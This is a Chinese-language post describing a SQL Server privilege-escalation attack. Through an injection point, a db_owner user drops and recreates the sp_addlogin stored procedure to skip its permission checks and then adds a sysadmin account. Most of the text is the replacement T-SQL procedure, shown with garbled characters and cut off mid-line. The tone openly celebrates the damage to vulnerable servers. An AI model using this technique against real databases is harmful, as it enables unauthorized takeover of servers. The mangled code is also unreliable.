MSSQL注入通杀，只要有注入点就有系统权限 
　　不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
　　@loginame sysname
　　,@passwd sysname = Null
　　,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
　　CONFIGURABLE???
　　,@deflanguage sysname = Null
　　,@sid varbinary(16) = Null
　　,@encryptopt varchar(20) = Null
　　AS
　　-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
　　set nocount on
　　Declare @ret int -- return value of sp call
　　-- DISALLOW USER TRANSACTION --
　　set implicit_transactions off
　　IF (@@trancount  0)
　　begin
　　raiserror(15002,-1,-1,’sp_addlogin’)
　　return (1)
　　end
　　-- VALIDATE LOGIN NAME AS:
　　-- (1) Valid SQL Name (SQL LOGIN)
　　-- (2) No backslash (NT users only)
　　-- (3) Not a reserved login name
　　execute @ret = sp_validname @loginame
　　if (@ret < 0)
　　return (1)
　　if (charindex(’’, @loginame)  0)
　　begin
　　raiserror(15006,-1,-1,@loginame)
　　return (1)
　　end
　　--Note: different case sa is allowed.
　　if (@loginame = ’sa’ or lower(@loginame) in (’public’))
　　begin
　　raiserror(15405, -1 ,-1, @loginame)
　　return (1)
　　end
　　-- LOGIN NAME MUST NOT ALREADY EXIST --
　　if exists(select * from master.dbo.syslogins where loginname =
　　@loginame)
　　begin
　　raiserror(15025,-1,-1,@loginame)
　　return (1)
　　end
　　-- VALIDATE DEFAULT DATABASE --
　　IF db_id(@defdb) IS NULL
　　begin
　　raiserror(15010,-1,-1,@defdb)
　　return (1)
　　end
　　-- VALIDATE DEFAULT LANGUAGE --
　　IF (@deflanguage IS NOT Null)
　　begin
　　Execute @ret = sp_validlang @deflanguage
　　IF (@ret < 0)
　　return (1)
　　end
　　ELSE
　　begin
　　select @deflanguage = name from master.dbo.syslanguages
　　where langid = @@default_langid --server default
　　language
　　if @deflanguage is null
　　select @deflanguage = N’us_english’
　　end
　　-- VALIDATE SID IF GIVEN --
　　if ((@sid IS NOT Null) and (datalength(@sid) < 16))
　　begin
　　raiserror(15419,-1,-1)
　　return (1)
　　end
　　else if @sid is null
　　select @sid = newid()
　　if (suser_sname(@sid) IS NOT Null)
　　begin
　　raiserror(15433,-1,-1)
　　return (1)
　　end
　　-- VALIDATE AND USE ENCRYPTION OPTION --
　　declare @xstatus smallint
　　select @xstatus = 2 -- access
　　if @encryptopt is null
　　select @passwd = pwdencrypt(@passwd)
　　else if @encryptopt = ’skip_encryption_old’
　　begin
　　select @xstatus = @xstatus&nb